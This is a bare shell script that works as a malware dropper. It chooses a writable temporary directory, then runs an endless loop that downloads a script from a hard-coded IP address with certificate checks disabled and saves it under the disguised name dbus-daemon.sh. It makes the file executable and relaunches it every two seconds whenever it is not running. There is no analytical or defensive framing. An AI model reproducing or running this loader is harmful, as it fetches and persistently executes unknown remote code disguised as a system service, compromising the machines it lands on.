#!/bin/sh

if [ -w "/dev/shm" ]; then
    DIR1="/dev/shm"
elif [ -w "/var/tmp" ]; then
    DIR1="/var/tmp"
elif [ -w "/tmp" ]; then
    DIR1="/tmp"
fi

while true; do
    if [ ! -f "${DIR1}/dbus-daemon.sh" ]; then
        curl --insecure --connect-timeout 10 -sL http://121.127.34.102/777.sh -o "${DIR1}/dbus-daemon.sh"
        chmod a+x "${DIR1}/dbus-daemon.sh"
    fi

    if ! pgrep -f 'dbus-daemon.sh' > /dev/null; then
        sh "${DIR1}/dbus-daemon.sh" > /dev/null 2>&1 
    fi
    sleep 2

done
